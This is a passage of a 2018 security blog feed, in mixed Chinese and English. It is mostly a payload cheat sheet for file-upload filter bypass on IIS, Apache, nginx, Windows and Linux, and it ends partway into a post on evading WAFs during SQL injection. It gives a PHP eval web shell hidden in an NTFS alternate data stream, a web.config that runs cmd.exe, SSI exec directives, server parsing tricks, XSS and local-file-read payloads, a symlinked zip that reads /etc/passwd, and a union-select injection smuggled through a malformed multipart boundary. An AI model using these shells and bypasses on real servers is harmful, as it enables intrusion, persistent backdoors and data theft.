shell<\/h2>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>&lt;% out.println(\"Hello test\");%&gt;     # jsp jspx \n&lt;%response.write(\"hello test\")%&gt;        # asp asmx aspx ashx soap web.config\n&lt;?php echo 11111;?&gt;     # php phtml phps phpt php3 php3p php4 php5   # which of these execute depends on the server configuration\nSome admins host php and asp applications under one big directory (virtual hosting), so one handler's extensions may be live on the other's site\n<\/code><\/pre><\/div><\/div>\n<h2 id=\"2-xss\">2. XSS<\/h2>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>Upload htm, html, shtml, xml files and the like\nBasic XSS payload: &lt;script&gt;alert(1337)&lt;\/script&gt;\nXML-based XSS payload: &lt;a:script xmlns:a=\"http:\/\/www.w3.org\/1999\/xhtml\"&gt;alert(1337)&lt;\/a:script&gt;\n\"&gt;&lt;img src=# onerror=alert(1)&gt;.jpg   # XSS through a file name that the upload handler reflects; works on Windows too\n<\/code><\/pre><\/div><\/div>\n<h2 id=\"3-\u89e3\u6790\u6f0f\u6d1e\">3. Parsing quirks<\/h2>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>IIS\nextensions: asa cer cdx   # handled by the asp engine on IIS 6\ndirectory parsing: \/1.asp\/1.jpg  # anything inside a directory named *.asp runs as asp; upload 1.jpg to get a shell\nfile parsing: 1.asp;.jpg   # IIS 6 stops at the semicolon\nIIS 7.0\/IIS 7.5\n1.jpg\/.php  # upload 1.jpg, request it with \/.php appended and php-cgi executes it (cgi.fix_pathinfo)\n\nApache\n1.php.aaa   # an unknown trailing extension makes Apache walk left until it finds one it knows; the default type is normally text\/plain\n1.php%0a    # affects Apache 2.4.0 to 2.4.29 on Linux: upload as 1.php followed by a \\x0A byte; CVE-2017-15715 https:\/\/www.leavesongs.com\/PENETRATION\/apache-cve-2017-15715-vulnerability.html \n\nnginx: null-byte code execution in old versions (0.5.x, 0.6.x, 0.7 \u2264 0.7.65, 0.8 \u2264 0.8.37)\n1.jpg%00.php   # upload 1.jpg, then request it like this\n1.jpg\/.php  # upload 1.jpg, append \/.php and it runs as php\nNginx 0.8.41 to 1.4.3 and 1.5.x before 1.5.7: CVE-2013-4547   # bypass access restrictions and read s.html \nhttp:\/\/127.0.0.1\/test \/..\/protected\/s.html  # note the space after the test directory\n# for code execution a directory named test%20 must exist (not needed on Windows); test with curl \n1.jpg \\0.php  # 1.jpg[0x20][0x00].php    # edit the encoding in burp\n\n# IIS and nginx hand anything whose URL ends in .php to php  \ncgi.fix_pathinfo (php repairs the path: for \/tt.php\/111.jpg\/111.jpg, when the last component does not exist it walks back until it reaches tt.php and runs that) \n\nlighttpd\n1.jpg\/1.php\n\nphp-cgi path-info quirk\nwith cgi.fix_pathinfo = 1 in php.ini, requesting http:\/\/www.xxx.com\/x.txt\/x.php where x.php does not exist runs x.txt as php\n\n<\/code><\/pre><\/div><\/div>\n\n<h1 id=\"0x02-window\">0x02 Windows<\/h1>\n<h2 id=\"1\u622a\u65ad\">1. Truncation<\/h2>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>Windows file naming rules   # https:\/\/docs.microsoft.com\/zh-cn\/windows\/desktop\/FileIO\/naming-a-file  \n8.3 names can be used, but the file gets renamed (web~1.con)     Note 1: Windows 8.3 feature could also be used but it would rename the web.config file to web~1.con in the end.\nFiles whose names contain &lt; &gt; cannot be created fresh, only existing files overwritten, because they act as wildcards   Note 2: Asterisk and question mark symbols cannot be used directly as the file system rejects them.\nType the vectors by hand rather than copy-pasting them      Note 3: Sometimes WordPress replaces double and single quotation marks with visually similar symbols. Therefore, it is recommended to type the vectors yourself in Burp Suite or other proxies that you use instead of copy\/paste them directly from here.\nPHP on Windows     # also usable for file inclusion\n&gt;       ?       # Greater-than symbol (closing angle bracket \"&gt;\") TO a question mark (\"?\")\n&lt;       *       # Less-than symbol (opening angle bracket \"&lt;\") TO an asterisk symbol (\"*\")\n\"       .       # Double quotation mark (\") TO a dot character (.)   \n\n1.php%20 (url decoded)    1.php.    1.php%00 (url decoded)  # all end up as 1.php\n1.php:aaa               # creates an empty 1.php, provided the file does not already exist\n1.ph&lt; or 1.ph&gt;          # creates the php webshell through wildcard matching\n\necho ^&lt;?php @eval($_REQUEST['caidao'])?^&gt;  &gt; index.php:hidden.jpg\nThis writes an invisible shell into the hidden.jpg alternate data stream of index.php: the usual file managers, type, dir and del will not show it. Another, normal file can include the ADS with &lt;?php include('index.php:hidden.jpg')?&gt;, and the one-liner is parsed as usual\n<\/code><\/pre><\/div><\/div>\n<h2 id=\"2ads\u6587\u4ef6\u6d41\">2. ADS (alternate data streams)<\/h2>\n<p>1.php::$DATA    # NTFS stream syntax; writes 1.php. Form: filename:streamname:streamtype<\/p>\n<h1 id=\"0x03-linux\">0x03 Linux<\/h1>\n<h2 id=\"1\u6587\u4ef6\u4e0a\u4f20xss\">1. XSS through file upload<\/h2>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>\"&gt;&lt;img src=# onerror=alert(1)&gt;.jpg   # XSS through a reflected file name; on Linux the place where the file is referenced works as well; try it at https:\/\/www.w3schools.com\/jsref\/tryit.asp?filename=tryjsref_fileupload_value  \nif a Linux server refuses .php, try pHp (case-sensitive denylist in front of a case-insensitive handler)\n<\/code><\/pre><\/div><\/div>\n<h1 id=\"0x04-iis\">0x04 IIS<\/h1>\n<h2 id=\"1xss\">1. XSS<\/h2>\n<p>Fuzz uncommon extensions for the web server in front of you; these also give XSS. Details in https:\/\/mike-n1.github.io\/ExtensionsOverview<br \/>\nbasic    .cer .hxt .htm  .stm<br \/>\nxml    .dtd .mno .vml .xsl .xht .svg .xml .xsd .xsf .svgz .xslt .wsdl .xhtml<\/p>\n<h2 id=\"2file_include-or-command_exec\">2. File include or command exec<\/h2>\n<p>By default IIS also supports SSI (Server-Side Include), a set of directives for the web server that are simply embedded in HTML comments; for security reasons the exec directive is disabled by default.<br \/>\n<strong>If the server does not handle .shtml: in IIS Role Services, under Application Development, install the Server Side Includes role<\/strong> <br \/>\nhttps:\/\/docs.microsoft.com\/en-us\/iis\/configuration\/system.webserver\/serversideinclude<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>&lt;!--#include file=\"web.config\"--&gt;   \/\/ read a file\n&lt;!--#include virtual=\"\/includes\/header.html\" --&gt; \/\/ also reads a file, by site-absolute path\n&lt;!--#exec cmd=\"ipconfig\"--&gt; \/\/ command execution if enabled; off by default and needs extra configuration  # could not get it enabled on win2008 IIS7\nExtensions for SSI: .stm .shtm .shtml   # common IIS values; other servers configure their own, Apache usually .shtml  
\n<\/code><\/pre><\/div><\/div>\n<h2 id=\"3shell\">3.shell<\/h2>\n<p>asp asmx ashx soap svc      #http:\/\/py4.me\/blog\/?p=448<\/p>\n<h3 id=\"webconfig-\u9700\u8981asp\u73af\u5883\u652f\u6301\">web.config #\u9700\u8981asp\u73af\u5883\u652f\u6301<\/h3>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code><span class=\"cp\">&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;<\/span>\n<span class=\"nt\">&lt;configuration&gt;<\/span>\n    <span class=\"nt\">&lt;system.webServer&gt;<\/span>\n        <span class=\"nt\">&lt;handlers<\/span> <span class=\"na\">accessPolicy=<\/span><span class=\"s\">\"Read, Script, Write\"<\/span><span class=\"nt\">&gt;<\/span>\n            <span class=\"nt\">&lt;add<\/span> <span class=\"na\">name=<\/span><span class=\"s\">\"web_config\"<\/span> <span class=\"na\">path=<\/span><span class=\"s\">\"*.config\"<\/span> <span class=\"na\">verb=<\/span><span class=\"s\">\"*\"<\/span> <span class=\"na\">modules=<\/span><span class=\"s\">\"IsapiModule\"<\/span> <span class=\"na\">scriptProcessor=<\/span><span class=\"s\">\"%windir%\\system32\\inetsrv\\asp.dll\"<\/span> <span class=\"na\">resourceType=<\/span><span class=\"s\">\"Unspecified\"<\/span> <span class=\"na\">requireAccess=<\/span><span class=\"s\">\"Write\"<\/span> <span class=\"na\">preCondition=<\/span><span class=\"s\">\"bitness64\"<\/span> <span class=\"nt\">\/&gt;<\/span>\n        <span class=\"nt\">&lt;\/handlers&gt;<\/span>\n        <span class=\"nt\">&lt;security&gt;<\/span>\n            <span class=\"nt\">&lt;requestFiltering&gt;<\/span>\n                <span class=\"nt\">&lt;fileExtensions&gt;<\/span>\n                    <span class=\"nt\">&lt;remove<\/span> <span class=\"na\">fileExtension=<\/span><span class=\"s\">\".config\"<\/span> <span class=\"nt\">\/&gt;<\/span>\n                <span class=\"nt\">&lt;\/fileExtensions&gt;<\/span>\n                <span class=\"nt\">&lt;hiddenSegments&gt;<\/span>\n                    <span 
class=\"nt\">&lt;remove<\/span> <span class=\"na\">segment=<\/span><span class=\"s\">\"web.config\"<\/span> <span class=\"nt\">\/&gt;<\/span>\n                <span class=\"nt\">&lt;\/hiddenSegments&gt;<\/span>\n            <span class=\"nt\">&lt;\/requestFiltering&gt;<\/span>\n        <span class=\"nt\">&lt;\/security&gt;<\/span>\n    <span class=\"nt\">&lt;\/system.webServer&gt;<\/span>\n<span class=\"nt\">&lt;\/configuration&gt;<\/span>\n<span class=\"err\">&lt;<\/span>%response.write(\"asp test\")%&gt;\n\u901a\u8fc7\u586b\u5165\u4e0b\u9762\u8bed\u53e5\u53ef\u6210\u529f\u6267\u884casp\u8bed\u53e5\n<span class=\"err\">&lt;<\/span>%\nResponse.write CreateObject(\"wscript.shell\").exec(\"cmd.exe \/c ipconfig\").StdOut.ReadAll\n%&gt;\n<span class=\"err\">&lt;<\/span>%=CreateObject(\"wscript.shell\").exec(\"cmd.exe \/c ipconfig\").StdOut.ReadAll()%&gt;\n<\/code><\/pre><\/div><\/div>\n<h3 id=\"asmx\">asmx<\/h3>\n<p>asmx demo<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>&lt;%@ WebService Language=\"C#\" Class=\"Service\" %&gt;\n \nusing System.Web;\nusing System.Web.Services;\nusing System.Web.Services.Protocols;\n \npublic class Service : System.Web.Services.WebService\n{\n    [WebMethod]\n    public string HelloWorld() {\n        return \"HelloWorld\";\n    }\n}\n\nhttp:\/\/192.168.44.132:8980\/customize.asmx\/Chopper   #\u83dc\u5200\u5bc6\u7801z\nz=A     #POST\u67e5\u770b\u8fd0\u884c\u76ee\u5f55  \nhttp:\/\/192.168.44.132:8980\/asmxWebMethodSpy.asmx\/Invoke     #\u5bc6\u7801Ivan\n<\/code><\/pre><\/div><\/div>\n<h3 id=\"ashx\">ashx<\/h3>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>\/\/\u6d4f\u89c8\u5668\u8bbf\u95ee\u8fd9\u4e2aashx\u6587\u4ef6\u6253\u5370Test!  
#\u8bc1\u660e\u53ef\u4ee5\u4f7f\u7528\n&lt;%@ WebHandler Language=\"C#\" Class=\"Handler\" %&gt;\nusing System;\nusing System.Web;\npublic class Handler : IHttpHandler{\n    public void ProcessRequest(HttpContext context)\n    {\n        context.Response.Write(\"Test!\");\n    }\n    public bool IsReusable\n    {\n        get\n        {\n            return false;\n        }\n    }\n}\nhttp:\/\/192.168.44.132:8980\/HandlerSpy.ashx?Ivan=context.Response.Write(DateTime.Now.ToString())     #\u8f93\u51fa\u65f6\u95f4\n<\/code><\/pre><\/div><\/div>\n<h1 id=\"0x05-apahce--httpd-or-tomcat\">0x05 apahce  (httpd or Tomcat)<\/h1>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>basic   .html.xxx .shtml\nxml .rdf .xht .xml .xsl .svg .xhtml .svgz   #apache\u8fd4\u56de\u5305\u91cc\u9762\u6ca1\u6709Content-type \u8fd9\u6837\u5c31\u53ef\u80fd\u6839\u636e\u6d4f\u89c8\u5668\u7684\u4e60\u6027\u9020\u6210xss\u653b\u51fb  \n<\/code><\/pre><\/div><\/div>\n<h2 id=\"1-shell-1\">1. 
shell<\/h2>\n<p>.htaccess<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>SetHandler application\/x-httpd-php  #\u6240\u6709\u6587\u4ef6\u89e3\u6790\u6210php \u4e5f\u53ef\u4ee5\u89e3\u6790\u6210\u5176\u4ed6\u811a\u672c\u5f62\u5f0f\u5982perl ruby\u53c2\u8003https:\/\/github.com\/wireghoul\/htshells\n<\/code><\/pre><\/div><\/div>\n<h1 id=\"0x06-nginx\">0x06 nginx<\/h1>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>basic   .htm\nxml     .svg .xml .svgz\n<\/code><\/pre><\/div><\/div>\n<h1 id=\"0x07\u6587\u4ef6\u8bfb\u53d6-or-ssrf-or-rce\">0x07.\u6587\u4ef6\u8bfb\u53d6 or SSRF or rce<\/h1>\n<h2 id=\"\u901a\u8fc7\u5ba2\u6237\u7aef\u6216\u8005\u76f8\u5e94\u7684\u524d\u7aef\u6846\u67b6\u672c\u5730\u8bfb\u53d6\u76f8\u5e94html\">\u901a\u8fc7\u5ba2\u6237\u7aef\u6216\u8005\u76f8\u5e94\u7684\u524d\u7aef\u6846\u67b6\u672c\u5730\u8bfb\u53d6\u76f8\u5e94html<\/h2>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>&lt;script&gt;alert(document.location);&lt;\/script&gt;  #get file_location  \u67e5\u770b\u5f53\u524d\u6e90  \n\u52a8\u6001\u7684\u6267\u884c\u76f8\u5173js   #\u524d\u63d0\u662f\u8c03\u7528\u6587\u4ef6\u4f7f\u7528file\u534f\u8bae\n&lt;embed src=\"c:\\\\windows\\\\win.ini\" width=\"400\" height=\"400\"&gt;\n&lt;object width=\"400\" height=\"400\" data=\"file:\/\/c:\/windows\/win.ini\"&gt;&lt;\/object&gt;\n&lt;iframe src=\"file:\/\/\/C:\/Windows\/win.ini\" width=\"400\" height=\"400\"&gt;\n&lt;embed src=\"file:\/\/c:\/windows\/win.ini\" width=\"400\" height=\"400\"&gt;\n&lt;iframe src=\"http:\/\/localhost\"&gt;&lt;\/iframe&gt;\n&lt;iframe 
src=\"..\/..\/..\/web.xml\"&gt;&lt;\/iframe&gt;\n\nhttp:\/\/www.noob.ninja\/2017\/11\/local-file-read-via-xss-in-dynamically.html\nhttps:\/\/buer.haus\/2017\/06\/29\/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read\/\nhttps:\/\/mike-n1.github.io\/SSRF_P4toP2\nhttps:\/\/hackernoon.com\/cross-site-scripting-to-remote-code-execution-on-trellos-app-699512676f0c    #Cross-Site Scripting to Local File Inclusion on Trello\u2019s App\nhttps:\/\/hackerone.com\/reports\/243058\nhttps:\/\/maustin.net\/2015\/11\/12\/hipchat_rce.html     #XSS to RCE in Atlassian Hipchat\nhttps:\/\/medium.com\/@arbazhussain\/xss-using-dynamically-generated-js-file-a7a10d05ff08\n<\/code><\/pre><\/div><\/div>\n<h2 id=\"2zip\u81ea\u89e3\u538b\">2.zip\u81ea\u89e3\u538b<\/h2>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>ln -s \/etc\/passwd link\nzip --symlinks test.zip link    #\u901a\u8fc7\u81ea\u89e3\u538bzip\u529f\u80fd\u5b9e\u73b0\u6587\u4ef6\u8bfb\u53d6https:\/\/xz.aliyun.com\/t\/2589    #\u4e0a\u4f20\u8f6f\u94fe\u63a5\u8bfb\u53d6passwd ln -s \/ test\n<\/code><\/pre><\/div><\/div>\n\n<p>\u5176\u4ed6\u53c2\u8003\u94fe\u63a5\u5982\u4e0b\uff1a<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>https:\/\/soroush.secproject.com\/downloadable\/microsoft_iis_tilde_character_vulnerability_feature.pdf     #iis\u7aef\u6587\u4ef6\u540d\u6f0f\u6d1e\nhttps:\/\/github.com\/ironbee\/ironbee-rules\/blob\/master\/support\/php\/test_fs_evasion.php \nhttps:\/\/soroush.secproject.com\/blog\/2014\/07\/file-upload-and-php-on-iis-wildcards\/  \nhttp:\/\/byd.dropsec.xyz\/2017\/02\/21\/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0-%E7%BB%95%E8%BF%87\/\n<\/code><\/pre><\/div><\/div>\n<p>#\n\u8f6c\u8f7d\u8bf7\u6ce8\u660e\uff1a<a href=\"https:\/\/notwhy.github.io\/\">whynot<\/a> \u00bb <a href=\"https:\/\/notwhy.gitbooks.io\/\/2018\/07\/file-upload\/\">file-upload<\/a><\/p>\n\n","pubDate":"Mon, 30 Jul 2018 00:00:00 
+0000","link":"http:\/\/notwhy.github.io\/2018\/07\/file-upload\/","guid":"http:\/\/notwhy.github.io\/2018\/07\/file-upload\/","category":"file-upload"},{"title":"sql-injection-fuck-waf","description":"<p>0x0 \u524d\u8a00 \n0x1 \u6ce8\u5165\u70b9\u68c0\u6d4b \n0x2 bypass waf \n0x3 \u81ea\u52a8\u5316<\/p>\n\n<h3 id=\"0x0-\u524d\u8a00\">0x0 \u524d\u8a00<\/h3>\n<hr \/>\n<p>\u2003\u2003\u8fd9\u91cc\u662f\u7b80\u5355\u5bf9sql\u6ce8\u5165\u7ed5\u8fc7waf\u7684\u4e00\u4e2a\u5c0f\u603b\u7ed3\uff0c\u975e\u5b89\u5168\u7814\u7a76\u5458\uff0c\u8fd9\u91cc\u4e0d\u8bb2\u539f\u7406\uff0c\u5173\u4e8e\u539f\u7406\u641c\u96c6\u4e86\u4e00\u4e9b\u5176\u4ed6\u5927\u4f6c\u7684\u6587\u7ae0\uff08\u6587\u7ae0\u5728\u6700\u4e0b\u9762\u8bf7\u81ea\u53d6\uff09\uff0c\u611f\u8c22\u4ed6\u4eec\u7684\u5206\u4eab\uff0c\u6bd4\u7740\u846b\u82a6\u753b\u74e2\uff0c\u5bf9\u7740\u5404\u5927waf\u5382\u5546\u8ddf\u7740\u5e08\u5085\u4eec\u6765\u4e00\u6ce2\u5b9e\u6218,\u8fdb\u884c\u4e00\u4e2a\u7b80\u5355\u7684\u603b\u7ed3\u3002<\/p>\n<h3 id=\"0x1-\u6ce8\u5165\u70b9\u68c0\u6d4b\">0x1 \u6ce8\u5165\u70b9\u68c0\u6d4b<\/h3>\n<p>\u2003\u2003\u4e00\u822c\u7684\u6ce8\u5165\u8fd8\u662f\u5f88\u597d\u5224\u65ad\u7684\uff0c\u7279\u522b\u662f\u57fa\u4e8e\u62a5\u9519\uff0c\u4f46\u6709\u7684\u65f6\u5019\u7565\u5fae\u6709\u4e9b\u5947\u8469\u7684\u73af\u5883\uff0c\u518d\u52a0\u4e0a\u4e00\u4e9b\u4e71\u4e03\u516b\u7cdf waf\uff0c\u5c31\u6bd4\u8f83\u96be\u641e\u4e86\uff0c\u8fd9\u91cc\u7b80\u5355\u603b\u7ed3\u4e86\u4e00\u4e9b\u65b9\u6cd5\u3002<\/p>\n<ul>\n  <li>\n    <p>\u5229\u7528\u6570\u636e\u5e93\u72ec\u6709\u7684\u4e00\u4e9b\u51fd\u6570 <br \/>\naccess  asc chr len #access-functions <br \/>\nmysql   substring   substr length <br \/>\nmssql   char ascii len substring    #mssql function str <br \/>\noracle  ascii  chr length  substr upper lower replace(x,old,new) <br 
\/>\n\u8fd9\u4e9b\u6570\u636e\u5e93\u4e2d\u4e00\u4e2a\u901a\u7528\u7684\u51fd\u6570\u5c31\u662fabs\uff0c\u5982\u679c\u89c9\u5f97\u662fint\u578b\u6ce8\u5165\u4e0d\u59a8\u5148\u8bd5\u8bd52-abs(1),\u7136\u540e\u7ed3\u5408\u5404\u7c7b\u6570\u636e\u5e93\u7684\u4e00\u4e9b\u51fd\u6570\u6765\u5224\u65ad\u662f\u4ec0\u4e48\u6570\u636e\u5e93\u7684\u6ce8\u5165,\u5f53\u7136\u5bf9\u6570\u636e\u5e93\u4e86\u89e3\u8d8a\u591a\u8d8a\u597d\u3002<\/p>\n  <\/li>\n  <li>\n    <p>\u6539\u53d8\u8bf7\u6c42\u65b9\u5f0f <br \/>\n\u6839\u636e\u7ecf\u9a8c\uff0c\u4e00\u822c\u60c5\u51b5\u4e0b\u5404\u811a\u672c\u5bf9http request method\u5982\u4e0b\uff0c\u8fd9\u91cc\u4ee5GET\u4e3a\u4f8b\u5b50\uff0c\u9488\u5bf9www.vul.com\/?id=1\u6765\u8fdb\u884c\u5224\u65ad\u3002 <br \/>\nphp GET <br \/>\naspx GET <br \/>\nasp GET POST COOKIE <br \/>\njsp GET POST <br \/>\n\u5e73\u5e38\u6e17\u900f\u6d4b\u8bd5\u4e2d\u603b\u662f\u9047\u5230\u5404\u79cd\u5404\u6837\u7684waf\uff0c\u6709\u7684\u65f6\u5019\u4e00\u4e2a\u5355\u5f15\u53f7\u5c31\u6b7b\u4e86\uff0c\u8fd9\u4e2a\u65f6\u5019\u9996\u9009\u7684\u4e00\u4e9b\u65b9\u6cd5\u5c31\u662f\u8f6c\u6362\u8bf7\u6c42\u5934\u4e86\uff0c\u6bd5\u7adfGET\u4e0d\u5982POST\uff0cPOST\u4e0d\u5982multipart\/form-data\uff0c\u5f53\u7136\u4e0d\u8981\u770b\u5230php\u5c31\u4e0d\u53bb\u8f6c\u6362\uff0c\u4efb\u4f55\u60c5\u51b5\u4e0b\u90fd\u8981\u5c1d\u8bd5\u4e00\u4e0b\u3002 <br \/>\n\u5f53\u7136\uff0c\u53ef\u4ee5\u7528burp\u5f88\u65b9\u4fbf\u7684\u6765\u8fdb\u884cchange request method\u4ee5\u53cachange body encoding\u3002<\/p>\n  
<\/li>\n<\/ul>\n\n<p>\u2003\u2003\u4e4b\u524d\u78b0\u5230\u8fc7\u4e00\u4e2a\u6709\u8da3\u7684\u4f8b\u5b50\uff0casp\u7684\u7ad9\u70b9\u53ef\u4ee5\u901a\u8fc7cookie\u63d0\u4ea4\u6570\u636e\uff0c\u800c\u4e14\u53ef\u4ee5\u4f7f\u7528len\u51fd\u6570\uff0c\u53ef\u4ee5\u521d\u6b65\u5224\u65ad\u4e3aaccess\u6216\u8005mssql\u6570\u636e\u5e93\uff0c\u4f46\u662f\u8fd8\u662f\u5f88\u5934\u75bc\uff0c\u6700\u540e\u4e00\u4f4d\u5927\u54e5\u4f7f\u7528\u4e0b\u9762\u7684\u51fd\u6570\u53ef\u4ee5\u5224\u65ad\u6210\u529f\u3002www.vul.com\/2.asp?id=482<br \/>\n\u2003\u2003483-chr(chr(52)&amp;chr(57))    #=482<br \/>\n\u2003\u2003chr(52) \u20184\u2019     <br \/>\n\u2003\u2003chr(57) \u20189\u2019  <br \/>\n\u2003\u2003chr(49) \u20181\u2019 #chr(52)&amp;chr(57)\u4e3a49 chr(49)\u4e3a1 \u867d\u7136\u6700\u540e\u4e5f\u6ca1\u4ec0\u4e48\u5375\u7528\u4f46\u8fd8\u662f\u633a\u6709\u610f\u601d\u7684<\/p>\n\n<ul>\n  <li>\n    <p>\u6570\u636e\u5e93\u7279\u6027 <br \/>\nmysql   \u6ce8\u91ca\u7b26\u53f7# \u2013+ ` ;%00 \/<strong>\/ \u5b57\u7b26\u4e32\u53ef\u4ee5\u4f7f\u7528\u6210\u5bf9\u7684\u5f15\u53f7\u2019admin\u2019 = admin\u2019\u2019\u2019 <br \/>\nmssql   \u6ce8\u91ca\u7b26\u53f7\u2013 \/<\/strong>\/ ;%00 <br \/>\noracle  \u6ce8\u91ca\u7b26\u53f7\u2013 \/**\/ admin=adm\u2019||\u2019in<br \/>\n\u7a7a\u767d\u7b26\u53f7\nMySQL5 09 0A 0B 0C 0D A0 20<br \/>\nOracle 00 0A 0D 0C 09 20<br \/>\nMSSQL 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20<br \/>\nmysql\u548cmssql\u53ef\u4ee5\u4f7f\u7528|\u6765\u8fdb\u884c\u76f8\u5173\u7684\u8fd0\u7b97\uff0c\u800coracle\u4f1a\u628a||\u5f53\u6210\u8fde\u63a5\u5b57\u7b26\u3002<\/p>\n  <\/li>\n  <li>\n    <p>web\u5bb9\u5668\u7279\u6027<br \/>\n\u8fd9\u91cc\u76f4\u63a5\u53ef\u4ee5\u8df3\u8fc7\u770bhttp:\/\/drops.xmd5.com\/static\/drops\/tips-7883.html \u8fd9\u7bc7\u6587\u7ae0<\/p>\n  <\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>1. 
iis+asp(x)  \n    1.%u\u7279\u6027: iis\u652f\u6301\u5bf9unicode\u7684\u89e3\u6790\uff0c\u5982:payload\u4e3a[s%u006c%u0006ect],\u89e3\u6790\u51fa\u6765\u540e\u5219\u662f[select]\n     %u0061nd 1=1\n    \u53e6\u7c7b%u\u7279\u6027: unicode\u5728iis\u89e3\u6790\u4e4b\u540e\u4f1a\u88ab\u8f6c\u6362\u6210multibyte\uff0c\u4f46\u662f\u8f6c\u6362\u7684\u8fc7\u7a0b\u4e2d\u53ef\u80fd\u51fa\u73b0:\u591a\u4e2awidechar\u53ef\u80fd\u4f1a\u8f6c\u6362\u4e3a\u540c\u4e00\u4e2a\u5b57\u7b26\u3002\n    \u5982\uff1aselect\u4e2d\u7684e\u5bf9\u5e94\u7684unicode\u4e3a%u0065\uff0c\u4f46\u662f%u00f0\u540c\u6837\u4f1a\u88ab\u8f6c\u6362\u6210\u4e3ae s%u00f0lect\n    iis+asp\n    2.%\u7279\u6027: union selec%t user fr%om dd #iis+asp asp+iis\u73af\u5883\u4e0b\u4f1a\u5ffd\u7565\u6389\u767e\u5206\u53f7\uff0c\u5982\uff1apayload\u4e3a[sele%ct], \u89e3\u6790\u51fa\u6765\u540e\u5219\u662f[select]\n    3.asp\/asp.net\u5728\u89e3\u6790\u8bf7\u6c42\u7684\u65f6\u5019\uff0c\u5141\u8bb8Content-Type: application\/x-www-form-urlencoded\u7684\u6570\u636e\u63d0\u4ea4\u65b9\u5f0fselect%201%20from%20user\n    asp\/asp.net request\u89e3\u6790:\n    4.\u5728asp\u548casp.net\u4e2d\u83b7\u53d6\u7528\u6237\u7684\u63d0\u4ea4\u7684\u53c2\u6570\u4e00\u822c\u4f7f\u7528request\u5305\uff0c\u5f53\u4f7f\u7528request(\u2018id\u2019)\u7684\u5f62\u5f0f\u83b7\u53d6\u5305\u7684\u65f6\u5019\uff0c\u4f1a\u51fa\u73b0GET\uff0cPOST\u5206\u4e0d\u6e05\u7684\u60c5\u51b5\uff0c\u8b6c\u5982\u53ef\u4ee5\u6784\u9020\u4e00\u4e2a\u8bf7\u6c42\u5305\uff0cMETHOD\u4e3aGET\uff0c\u4f46\u662f\u5305\u4e2d\u8fd8\u5e26\u6709POST\u7684\u5185\u5bb9\u548cPOST\u7684content-type, \u6362\u4e00\u79cd\u7406\u89e3\u65b9\u5f0f\u4e5f\u5c31\u662f\u5c06\u539f\u672c\u7684post\u6570\u636e\u5305\u7684method\u6539\u6210GET,\u5982\u679c\u4f7f\u7528request(\u2018id\u2019)\u65b9\u5f0f\u83b7\u53d6\u6570\u636e\uff0c\u4ecd\u4f1a\u83b7\u53d6\u5230post\u7684\u5185\u5bb9\n2. 
php+apache\u7578\u5f62\u7684boundary\n    1.php\u5728\u89e3\u6790multipart data\u7684\u65f6\u5019\u6709\u81ea\u5df1\u7684\u7279\u6027\uff0c\u5bf9\u4e8eboundary\u7684\u8bc6\u522b\uff0c\u53ea\u53d6\u4e86\u9017\u53f7\u524d\u9762\u7684\u5185\u5bb9\uff0c\u4f8b\u5982\u6211\u4eec\u8bbe\u7f6e\u7684boundary\u4e3a\u2014-aaaa,123456\uff0cphp\u89e3\u6790\u7684\u65f6\u5019\u53ea\u8bc6\u522b\u4e86\u2014-aaaa,\u540e\u9762\u7684\u5185\u5bb9\u5747\u6ca1\u6709\u8bc6\u522b\u3002\u7136\u800c\u5176\u4ed6\u7684\u5982WAF\u5728\u505a\u89e3\u6790\u7684\u65f6\u5019\uff0c\u6709\u53ef\u80fd\u83b7\u53d6\u7684\u662f\u6574\u4e2a\u5b57\u7b26\u4e32\uff0c\u6b64\u65f6\u53ef\u80fd\u5c31\u4f1a\u51fa\u73b0BYPASS\n    Content-Type: multipart\/form-data; boundary=------,xxxx\n    Content-Length: 191\n    \n    ------,xxxx\n    Content-Disposition: form-data; name=\"img\"; filename=\"img.gif\"\n    \n    GIF89a\n    ------\n    Content-Disposition: form-data; name=\"id\"\n    \n    1' union select null,null,flag,null from flag limit 1 offset 1-- -\n    --------\n    ------,xxxx--\n    2.\u7578\u5f62method(header\u5934\u4e2d)\n    \u67d0\u4e9bapache\u7248\u672c\u5728\u505aGET\u8bf7\u6c42\u7684\u65f6\u5019\uff0c\u65e0\u8bbamethod\u4e3a\u4f55\u503c\u5747\u4f1a\u53d6\u51faGET\u7684\u5185\u5bb9\u3002\u5982\u8bf7\u6c42\u7684method\u540d\u4e3aDOTA\uff0c\u4f9d\u7136\u4f1a\u8fd4\u56deGET\u65b9\u6cd5\u7684\u503c\uff0c\u5373,\u53ef\u4ee5\u4efb\u610f\u66ff\u6362GET\u65b9\u6cd5\u4e3a\u5176\u5b83\u503c\uff0c\u4f46\u4ecd\u80fd\u6709\u6548\u5de5\u4f5c\uff0c\u4f46\u5982\u679cwaf\u4e25\u683c\u6309\u7167GET\u65b9\u6cd5\u53d6\u503c\uff0c\u5219\u53d6\u4e0d\u5230\u4efb\u4f55\u5185\u5bb9\n3. 
